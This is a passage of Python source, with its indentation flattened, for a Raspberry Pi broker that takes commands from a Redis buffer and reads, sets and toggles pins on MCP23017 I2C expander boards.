try:
# Remember: fields are: id, command TEXT, boardnr TEXT DEFAULT '0x00', pinnr TEXT DEFAULT '0x00', datavalue TEXT DEFAULT '0x00'
self._log.info(2, "Verifying Commands database with dummy write.")
id = (datetime.now() - datetime.utcfromtimestamp(0)).total_seconds()
datamap = {'command':DUMMY_COMMAND, 'boardnr':0x00, 'pinnr':0xff, 'datavalue':0x00}
# Write the info to the Redis database
self._commands.hset(id, None, None, datamap)
# Set expiration to a short 1 second, after which Redis will automatically delete the record
self._commands.expire(id, 1)
except:
# Capturing all errors.
self._log.error(1, "FATAL UNEXPECTED ERROR. Could not read and/or write the [Commands] database. This program is now exiting with error [{}].".format(sys.exc_info()[0]))
# If a database cannot be processed, this program makes no sense, so exiting.
sys.exit(1)
# Next, do a dummy write to the Responses database, as verification that the database is fully up and running.
try:
# Remember: fields are: id, command_id TEXT, datavalue TEXT, response TEXT
self._log.info(2, "Verifying Responses database with dummy write.")
id = (datetime.now() - datetime.utcfromtimestamp(0)).total_seconds()
datamap = {'datavalue':0x00, 'response':'OK'}
# Write the info to the Redis database
self._responses.hset(id, None, None, datamap)
# Set expiration to a short 1 second, after which Redis will automatically delete the record
self._responses.expire(id, 1)
except:
# Capturing all errors.
self._log.error(1, "FATAL UNEXPECTED ERROR. Could not read and/or write the [Responses] database. This program is now exiting with error [{}].".format(sys.exc_info()[0]))
# If a database cannot be processed, this program makes no sense, so exiting.
sys.exit(1)
def GetNextCommand(self):
"""
Fetches the oldest command - that has not expired - from the commands buffer.
"""
# Get all keys from the Commands table
rkeys = self._commands.keys("*")
# Key IDs are based on the timestamp, so sorting will pick the oldest first
rkeys.sort()
# Check if there are keys available
if len(rkeys) > 0:
# Get the first key from the list
id = rkeys[0]
# Read the Redis data
datarecord = self._commands.hgetall(id)
# We have the data, now delete the record (don't wait for the time-out)
self._commands.delete(id)
# pull the data from the record, and do proper conversions.
# Correct potential dirty entries, to avoid that the software crashes on poor data.
try:
return_id = float(id.decode('ascii'))
except:
return_id = 0
try:
command = datarecord[b'command'].decode('ascii')
except:
command = ''
try:
boardnr = datarecord[b'boardnr'].decode('ascii')
except:
boardnr = 0x00
try:
pinnr = datarecord[b'pinnr'].decode('ascii')
except:
pinnr = 0x00
try:
datavalue = datarecord[b'datavalue'].decode('ascii')
except:
datavalue = 0x00
# return the data read
return(return_id, command, boardnr, pinnr, datavalue)
else:
# return a zero record if nothing was received
return (0, '', 0x00, 0x00, 0x00)
def ReturnResponse(self, id, value, response):
"""
Returns the data value to the client through the Responses buffer.
Also does the house-keeping, deleting all old entries that would still exist.
"""
# Remember: fields are : id, command_id TEXT, datavalue TEXT, response TEXT
# The Response ID is the same as the Command ID, making it easy for the client to capture the data.
mapping = {'command_id':id, 'datavalue':value, 'response':response}
self._responses.hset(id, None, None, mapping)
# set auto-delete time-out in the Redis database. Add several seconds grace period, and round to integer values
self._responses.expire(id, round(COMMAND_TIMEOUT + 2))
class mcp23017broker():
"""
A class that is a man in the middle between external clients and I2C attached devices.
This class is based on a shared memory database.
"""
def __init__(self, the_log, i2chandler, xmldata = None):
# Copy logfile to local
self._log = the_log
# Create a handler for the I2C communications
self._i2chandler = i2chandler
# Inherit the xmldata communication
self._xmldata = xmldata
# Create a data pipe to the in-memory database
self._datapipe = databaseHandler(self._log)
def service_commands(self):
"""
Process incoming data coming from the connected clients (one at the time).
Properly formatted commands are processed immediately, or as separate threads (for long-lasting commands).
"""
# Fetch a command from the pipe
command_list = self._datapipe.GetNextCommand()
# a command id larger than 0 is a successful read. Command ID zero is returned if the pipe is empty.
if command_list[0] > 0:
self._log.info(2, "Received command with id [{}]: [{}] for board [{}] and pin [{}].".format(str(command_list[0]), command_list[1], str(command_list[2]), str(command_list[3])))
# Start the reply error with an empty error
self._return_error = ""
# retrieve commands from the pipe
command_id = command_list[0]
the_command = command_list[1]
the_board = command_list[2]
the_pin = command_list[3]
# During initialization a dummy command is sent. This is also done by the clients, so make sure that these commands are thrown away.
if the_command != DUMMY_COMMAND:
# Inputs can have different formats, also numerical as hexadecimal (e.g. '0x0f'). Convert where necessary.
if(isinstance(the_board,str)):
if 'x' in the_board:
the_board = int(the_board, 16)
else:
the_board = int(the_board, 10)
the_value = command_list[3]
if(isinstance(the_value,str)):
if 'x' in the_value:
the_value = int(the_value, 16)
else:
the_value = int(the_value, 10)
# Describe what we are expecting on the bus.
set_expectation = "Error: first command must be one of the following {}, {}, {}, {}, {}, {}, {}, {}, {}, {}. ".format(FINDBOARD, GETDIRBIT, GETDIRREGISTER, SETDIRBIT, CLEARDIRBIT, GETIOPIN, GETIOREGISTER, SETDATAPIN, CLEARDATAPIN, TOGGLEPIN)
# Using a try here, because the command could also be very, very dirty.
try:
if the_command not in {FINDBOARD, GETIOPIN, SETDIRBIT, CLEARDIRBIT, GETDIRBIT, SETDATAPIN, CLEARDATAPIN, GETIOREGISTER, GETDIRREGISTER, TOGGLEPIN}:
self._return_error += set_expectation
self._log.info(2, set_expectation)
except:
# Exception can happen if the_command is something _very_ weird, so need to capture that too without crashing
self._return_error += set_expectation
self._log.info(2, set_expectation)
# Test if Board ID is a hex number within allowed Board IDs
try:
if not(the_board in range(MINBOARDID, MAXBOARDID)):
self._return_error += "Error: Board ID not in range [0x{:0{}X}, 0x{:0{}X}]. ".format(MINBOARDID, 2, MAXBOARDID-1, 2)
self._log.info(2, "Error: Board ID not in range [0x{:0{}X}, 0x{:0{}X}]. ".format(MINBOARDID, 2, MAXBOARDID-1, 2))
except:
# print error message to the systemctl log file
if LOG_LEVEL == 2:
print(traceback.format_exc())
self._return_error += "Error: wrongly formatted register. "
self._log.info(2, "Error: wrongly formatted register. ")
# Test if the pin number is a hex number from 0x00 to 0x0f (included)
try:
if not(the_value in range(MINPIN, MAXPIN)):
self._return_error += "Error: registervalue not in range [0x{:0{}X}, 0x{:0{}X}]. ".format(MINPIN, 2, MAXPIN, 2)
self._log.info(2, "Error: registervalue not in range [0x{:0{}X}, 0x{:0{}X}]. ".format(MINPIN, 2, MAXPIN, 2))
except:
# print error message to the systemctl log file
if LOG_LEVEL == 2:
print(traceback.format_exc())
self._return_error += "Error: wrongly formatted data byte. "
self._log.info(2, "Error: wrongly formatted data byte. ")
# All checks done, continue processing if no errors were found.
if self._return_error == '':
# print status message to the systemctl log file
if LOG_LEVEL == 2:
print("Processing: {}, {}, {}.".format(the_command, the_board, the_value))
# Command format looks good, now process it and get the result back
return_data = self.ProcessCommand(the_command, the_board, the_value)
# Send an "OK" back, since we didn't find an error.
self._datapipe.ReturnResponse(command_id, return_data, 'OK')
self._log.debug(2, "Action result: {} OK\n".format(return_data))
else:
# print error message to the systemctl log file
if LOG_LEVEL > 0:
print(self._return_error)
# Send back an error if the command was not properly formatted. Do nothing else
self._datapipe.ReturnResponse(command_id, '0x00', self._return_error)
def ProcessCommand(self, task, board_id, pin):
"""
Identifies command and processes the command on the I2C bus.
"""
# Process I2C bus commands based on board ID and Pin nr
return_byte = ""
try:
if task == GETDIRBIT:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
return_byte = '0x{:0{}X}'.format(self._i2chandler.GetI2CDirPin(board_id, pin),2)
self._log.info(2, "Received byte [{}] from pin [{}] on board [{}] through GetI2CDirPin".format(return_byte, pin, board_id))
elif task == FINDBOARD:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
return_byte = '0x{:0{}X}'.format(self._i2chandler.IdentifyBoard(board_id),2)
self._log.info(2, "Received byte [{}] from board [{}] through IdentifyBoard".format(return_byte, board_id))
elif task == GETDIRREGISTER:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
return_byte = '0x{:0{}X}'.format(self._i2chandler.GetI2CDirRegister(board_id, pin),2)
self._log.info(2, "Received byte [{}] from pin [{}] on board [{}] through GetI2CDirRegister".format(return_byte, pin, board_id))
elif task == SETDIRBIT:
return_byte = ""
self._i2chandler.SetI2CDirPin(board_id, pin)
self._log.info(2, "Setting DIR bit [{}] on board [{}] through SetI2CDirPin".format(pin, board_id))
if self._xmldata is not None:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
self._xmldata.set_board_pin(board_id, pin)
elif task == CLEARDIRBIT:
return_byte = ""
self._i2chandler.ClearI2CDirPin(board_id, pin)
self._log.info(2, "Clearing DIR bit [{}] on board [{}] through ClearI2CDirPin".format(pin, board_id))
if self._xmldata is not None:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
self._xmldata.clear_board_pin(board_id, pin)
elif task == GETIOPIN:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
return_byte = '0x{:0{}X}'.format(self._i2chandler.GetI2CPin(board_id, pin),2)
self._log.info(2, "Received byte [{}] from pin [{}] on board [{}] through GetI2CPin".format(return_byte, pin, board_id))
elif task == GETIOREGISTER:
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
return_byte = '0x{:0{}X}'.format(self._i2chandler.GetI2CIORegister(board_id, pin),2)
self._log.info(2, "Received Register [{}] from pin [{}] on board [{}] through GetI2CIORegister".format(return_byte, pin, board_id))
elif task == SETDATAPIN:
return_byte = ""
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
self._i2chandler.SetI2CPin(board_id, pin)
self._log.info(2, "Setting bit [{}] on board [{}] through SetI2CPin".format(pin, board_id))
elif task == CLEARDATAPIN:
return_byte = ""
self._i2chandler.WaitForPinToBeReleased(board_id, pin, False)
self._i2chandler.ClearI2CPin(board_id, pin)
self._log.info(2, "Clearing bit [{}] on board [{}] through ClearI2CPin".format(pin, board_id))
elif task == TOGGLEPIN:
return_byte = ""
self._i2chandler.ToggleI2CPin(board_id, pin)
self._log.info(2, "Toggling bit [{}] on board [{}] through ToggleI2CPin".format(pin, board_id))
else:
# print error message to the systemctl log file
if LOG_LEVEL > 1:
print("Error: Did not understand command [{}].".format(task))
self._log.error(2, "Error: Did not understand command [{}].".format(task))
except Exception as err:
error_string = traceback.format_exc()
# print error message to the systemctl log file
if LOG_LEVEL == 1:
print(error_string)
if self._xmldata is not None:
self._xmldata.DeleteKey(board_id)
self._log.error(1, "Error when processing I2C command: {}.".format(error_string))
return return_byte
class i2cCommunication():
"""
A class for doing communications to MCP23017 devices on the Raspberry Pi I2C bus.
"""
def __init__(self, the_log):
# Copy logfile to local
self._log = the_log
self._log.info(2, "Initializing I2C Communication class.")
# Create an empty set to be used for avoiding that multiple toggle commands can operate on the same pin
# A mutex is needed to manage the self._toggle_set in a unique way
self._toggle_set = set()
self._toggle_mutex = Lock()
# Create a new I2C bus (port 1 of the Raspberry Pi)
if DEMO_MODE_ONLY:
self.i2cbus = 0
else:
self.i2cbus = SMBus(1)
self._log.info(2, "Initializing SMBus 1 (I2C).")
# Set up a Mutual Exclusive lock, such that parallel threads are not interfering with another thread writing on the I2C bus
self._i2cMutex = Lock()
self._log.info(2, "Initialized I2C Mutex.")
# Initialize the boards that are being handled.
self.managedboards = []
@property
def allmanagedboards(self):
return self.managedboards
def CheckInitializeBoard(self, board_id):
"""
Verifies if a board is already in the managed list.
If not, the Control Register for the board is initialized.
"""
# if board_id is given as a hex string, convert to int
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
return_value = True
try:
# check if a board is already managed. This lookup will result in an error if not
dummy = (self.managedboards.index(board_id) >= 0)
except:
# Wait for the I2C bus to become free
self._log.info(2, "Writing data [0x02] to IOCON register for board [0x{:0{}X}]".format(board_id, 2))
self._i2cMutex.acquire()
try:
# Initialize configuration register of the new board
if DEMO_MODE_ONLY:
print("SIMULATION : writing data [0x02] to IOCON register for board [0x{:0{}X}]".format(board_id, 2))
else:
self.i2cbus.write_byte_data(board_id, IOCON, 0x02)
# Since not yet existing, add board to managed list if initialization was successful
self.managedboards.append(board_id)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
if not(return_value):
self._log.error(2, "Writing [0x02] to IOCON register for board [0x{:0{}X}] Failed !".format(board_id, 2))
return return_value
def ReadI2CDir(self, board_id, port_id):
"""
Function for reading the full DIR Register value for a specific IO board.
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(port_id,str)):
port_id = int(port_id, 16)
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = -1
# Only start writing if the I2C bus is available
self._log.info(2, "Reading DIR port [0x{:0{}X}] on board [0x{:0{}X}]".format(port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
# Read the current value of the DIR register
if DEMO_MODE_ONLY:
print("SIMULATION : reading DIR port [0x{:0{}X}] on board [0x{:0{}X}]".format(port_id, 2, board_id, 2))
return_value = 0xff
else:
return_value = self.i2cbus.read_byte_data(board_id, port_id)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = -1
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = -1
return return_value
def WriteI2CDir(self, board_id, port_id, newvalue):
"""
Function for writing the full DIR Register value for a specific IO board
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(port_id,str)):
port_id = int(port_id, 16)
if(isinstance(newvalue,str)):
newvalue = int(newvalue, 16)
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = True
# Only start writing if the I2C bus is available
self._log.info(2, "Writing DIR port [0x{:0{}X}] on board [0x{:0{}X}] to new value [0x{:0{}X}]".format(port_id, 2, board_id, 2, newvalue, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
print("SIMULATION : writing DIR port [0x{:0{}X}] on board [0x{:0{}X}] to new value [0x{:0{}X}]".format(port_id, 2, board_id, 2, newvalue, 2))
return_value = True
else:
# Write the new value of the DIR register
self.i2cbus.write_byte_data(board_id, port_id, newvalue)
# Verify if the value is indeed accepted
verification = self.i2cbus.read_byte_data(board_id, port_id)
if verification != newvalue:
return_value = False
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = False
return return_value
def IdentifyBoard(self, board_id):
"""
Identifies if board exists on the I2C bus.
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = 1
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
pin_nr = 1 # pick random pin number to be read from the board. We are not going to use it anyway.
port_id = IODIRA
# Only start reading if the I2C bus is available
self._log.info(2, "Reading DIR pin from port [0x{:0{}X}] of board [0x{:0{}X}]".format(port_id, 2, board_id, 2))
#self.i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
return_value = (1 << pin_nr)
print("SIMULATION : reading DIR pin [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(return_value, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
_ = self.i2cbus.read_byte_data(board_id, port_id) & (1 << pin_nr)
return_value = 1
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = 0
#finally:
# # Free Mutex to avoid a deadlock situation
# self.i2cMutex.release()
else:
return_value = 0
return return_value
def GetI2CDirPin(self, board_id, pin_nr):
"""
Gets the current DIR value of a pin on a board
Pin number must be between 0 and 15
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = -1
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = 1
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (pin_nr > 7):
port_id = IODIRB
pin_nr = pin_nr % 8
else:
port_id = IODIRA
# Only start reading if the I2C bus is available
self._log.info(2, "Reading DIR pin from port [0x{:0{}X}] of board [0x{:0{}X}]".format(port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
return_value = (1 << pin_nr)
print("SIMULATION : reading DIR pin [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(return_value, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
if (self.i2cbus.read_byte_data(board_id, port_id) & (1 << pin_nr)) == 0x00:
return_value = 0
else:
return_value = 1
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = -1
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = -1
return return_value
def GetI2CDirRegister(self, board_id, reg_nr):
"""
Gets the current value of a full DIR register on a board
Register number must be between 0 and 15; 0 selects IODIRA, any higher value selects IODIRB
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(reg_nr,str)):
reg_nr = int(reg_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (reg_nr < 0) or (reg_nr > 15):
return_value = -1
#raise Exception("Pin number must be between 0 and 15, but got [", pin_nr, "] for board ", board_id)
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = 1
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (reg_nr > 0):
port_id = IODIRB
else:
port_id = IODIRA
# Only start reading if the I2C bus is available
self._log.info(2, "Reading DIR register from port [0x{:0{}X}] of board [0x{:0{}X}]".format(port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
return_value = 0xff
print("SIMULATION : reading DIR register [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(return_value, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
return_value = self.i2cbus.read_byte_data(board_id, port_id)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = -1
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = -1
return return_value
def SetI2CDirPin(self, board_id, pin_nr):
"""
Sets a pin to INPUT on a board
Pin number must be between 0 and 15
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = False
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = True
# Pin values up to 0x0f go to IODIRA, higher values go to IODIRB
if (pin_nr > 7):
port_id = IODIRB
pin_nr = pin_nr % 8
else:
port_id = IODIRA
# Only start writing if the I2C bus is available
self._log.info(2, "Setting pin [0x{:0{}X}] to INPUT port [0x{:0{}X}] for board [0x{:0{}X}]".format(pin_nr, 2, port_id, 2, board_id,2))
self._i2cMutex.acquire()
try:
# Read the current state of the IODIR, then set ('OR') the one pin
if DEMO_MODE_ONLY:
data_byte = (1 << pin_nr)
print("SIMULATION : setting pin [0x{:0{}X}] to INPUT port [0x{:0{}X}] for board [0x{:0{}X}]".format(data_byte, 2, port_id, 2, board_id,2))
else:
data_byte = self.i2cbus.read_byte_data(board_id, port_id) | (1 << pin_nr)
self.i2cbus.write_byte_data(board_id, port_id, data_byte)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = False
return return_value
def ClearI2CDirPin(self, board_id, pin_nr):
"""
Sets a pin to OUTPUT on a board
Pin number must be between 0 and 15
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = False
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = True
# Pin values up to 0x0f go to IODIRA, higher values go to IODIRB
if (pin_nr > 7):
port_id = IODIRB
pin_nr = (pin_nr % 8)
else:
port_id = IODIRA
# Only start writing if the I2C bus is available
self._log.info(2, "Setting pin [0x{:0{}X}] to OUTPUT on port [0x{:0{}X}] for board [0x{:0{}X}]".format(pin_nr, 2, port_id, 2, board_id,2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
data_byte = (1 << pin_nr)
print("SIMULATION : Setting pin [0x{:0{}X}] to OUTPUT on port [0x{:0{}X}] for board [0x{:0{}X}]".format(data_byte, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IODIR, then clear ('AND') the one pin
data_byte = self.i2cbus.read_byte_data(board_id, port_id) & ~(1 << pin_nr)
self.i2cbus.write_byte_data(board_id, port_id, data_byte)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = False
return return_value
def GetI2CPin(self, board_id, pin_nr):
"""
Gets the current value of a pin on a board
Pin number must be between 0 and 15
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = -1
#raise Exception("Pin number must be between 0 and 15, but got [", pin_nr, "] for board ", board_id)
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = 1
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (pin_nr > 7):
port_id = GPIOB
pin_nr = pin_nr % 8
else:
port_id = GPIOA
# Only start reading if the I2C bus is available
self._log.info(2, "Reading pin [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(pin_nr, 2, port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
return_value = (1 << pin_nr)
print("SIMULATION : reading pin [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(return_value, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
if (self.i2cbus.read_byte_data(board_id, port_id) & (1 << pin_nr)) == 0x00:
return_value = 0
else:
return_value = 1
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = -1
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = -1
return return_value
def GetI2CIORegister(self, board_id, reg_nr):
"""
Gets the current value of a full IO register on a board
Register number must be between 0 and 15; 0 selects GPIOA, any higher value selects GPIOB
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(reg_nr,str)):
reg_nr = int(reg_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (reg_nr < 0) or (reg_nr > 15):
return_value = -1
#raise Exception("Pin number must be between 0 and 15, but got [", pin_nr, "] for board ", board_id)
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = 1
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (reg_nr > 0):
port_id = GPIOB
else:
port_id = GPIOA
# Only start reading if the I2C bus is available
self._log.info(2, "Reading register [0x{:0{}X}], i.e. port [0x{:0{}X}] of board [0x{:0{}X}]".format(reg_nr, 2, port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
return_value = 0xff
print("SIMULATION : reading register [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(return_value, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
return_value = self.i2cbus.read_byte_data(board_id, port_id)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = -1
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = -1
return return_value
def SetI2CPin(self, board_id, pin_nr):
"""
Sets a pin to HIGH on a board
Pin number must be between 0 and 15
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = False
#raise Exception("Pin number must be between 0 and 15, but got [", pin_nr, "] for board ", board_id)
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = True
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (pin_nr > 7):
port_id = GPIOB
pin_nr = pin_nr % 8
else:
port_id = GPIOA
# Only start writing if the I2C bus is available
self._log.info(2, "Setting pin [0x{:0{}X}] to HIGH on port [0x{:0{}X}] for board [0x{:0{}X}]".format(pin_nr, 2, port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
data_byte = (1 << pin_nr)
print("SIMULATION : setting pin [0x{:0{}X}] to HIGH on port [0x{:0{}X}] for board [0x{:0{}X}]".format(data_byte, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
data_byte = self.i2cbus.read_byte_data(board_id, port_id) | (1 << pin_nr)
self.i2cbus.write_byte_data(board_id, port_id, data_byte)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = False
return return_value
def ClearI2CPin(self, board_id, pin_nr):
"""
Sets a pin to LOW on a board
Pin number must be between 0 and 15
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = False
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = True
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (pin_nr > 7):
port_id = GPIOB
pin_nr = (pin_nr % 8)
else:
port_id = GPIOA
# Only start writing if the I2C bus is available
self._log.info(2, "Setting pin [0x{:0{}X}] to LOW on port [0x{:0{}X}] for board [0x{:0{}X}]".format(pin_nr, 2, port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
data_byte = (1 << pin_nr)
print("SIMULATION : setting pin [0x{:0{}X}] to LOW on port [0x{:0{}X}] for board [0x{:0{}X}]".format(data_byte, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
data_byte = self.i2cbus.read_byte_data(board_id, port_id) & ~(1 << pin_nr)
self.i2cbus.write_byte_data(board_id, port_id, data_byte)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = False
return return_value
def ToggleI2CPin(self, board_id, pin_nr, acquire_state = False):
"""
Toggles a bit on the board. If the pin is high, it will be momentarily set to low. If it is low, it will toggle to high.
Pin number must be between 0 and 15.
Per default it is expected that the pin is low in the "off" state and has to be toggled high, e.g. to trigger a momentary
switch. In some cases, the trigger is to the "other" side. acquire_state can be set to first assess the pin and briefly
toggle the pin to the other high/low state.
"""
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = False
else:
return_value = True
# Toggling can take a long time, during which the server would not be able to process additional commands.
# To avoid that the server is frozen, toggles are processed in separate threads.
a_thread = Thread(target = self.PinToggler, args = [board_id, pin_nr, acquire_state], daemon = False)
a_thread.start()
return return_value
def WaitForPinToBeReleased(self, board_id, pin_nr, lock_if_free = False):
"""
Toggling can take a long time, during which the server would not be able to process additional commands.
To avoid that the server is frozen, toggles are processed in separate threads. The boards being
processed are maintained in the _toggle_set. As long as a thread has a toggle action going on, no other
actions are allowed on the specific board/pin combination. Therefore, all writes have to wait for the
pin to be freed up again.
"""
# The verification can not last longer than a TOGGLEDELAY. Keep track of the time, and time-out if necessary
checking_time = datetime.now()
keep_checking = True
while keep_checking:
# The _toggle_set is protected with a mutex to avoid that two threads are manipulating at the same
# moment, thus resulting in data errors.
acquired = self._toggle_mutex.acquire(blocking = True, timeout = COMMAND_TIMEOUT)
if acquired:
if (board_id, pin_nr) not in self._toggle_set:
if lock_if_free:
self._toggle_set.add((board_id, pin_nr))
keep_checking = False
self._toggle_mutex.release()
if (datetime.now() - checking_time).total_seconds() > max (COMMAND_TIMEOUT, TOGGLEDELAY):
keep_checking = False
raise "Time-out error trying to acquire pin {} on board {}".format(board_id, pin_nr)
def PinToggler(self, board_id, pin_nr, acquire_state = False):
"""
The PinToggler is a separate process, run in a thread. This allows the main loop to continue processing other read/write requests.
"""
# First make sure to do the bookkeeping.
if self.CheckInitializeBoard(board_id):
Process_Toggle = False
try:
self.WaitForPinToBeReleased(board_id, pin_nr, True)
Process_Toggle = True
except Exception as err:
self._log.error(2, "Unable to toggle pin [0x{:0{}X}] on board [0x{:0{}X}]: Could not get pin free within [{}] seconds. Error Message: {}".format(pin_nr, 2, board_id, 2, COMMAND_TIMEOUT, err))
Process_Toggle = False
if Process_Toggle:
self._log.info(2, "Toggling pin [0x{:0{}X}] on board [0x{:0{}X}]".format(pin_nr, 2, board_id, 2))
# Default is that pin is toggled from low to high briefly.
# If 'acquire_state' is set, the current state is assessed, and switched briefly to the "other" high/low state.
if acquire_state:
current_state = self.GetI2CPin(board_id, pin_nr)
else:
# Default is Low for current state and toggle to high to switch on e.g. a momentary switch.
current_state = 0x0
if current_state == 0x0:
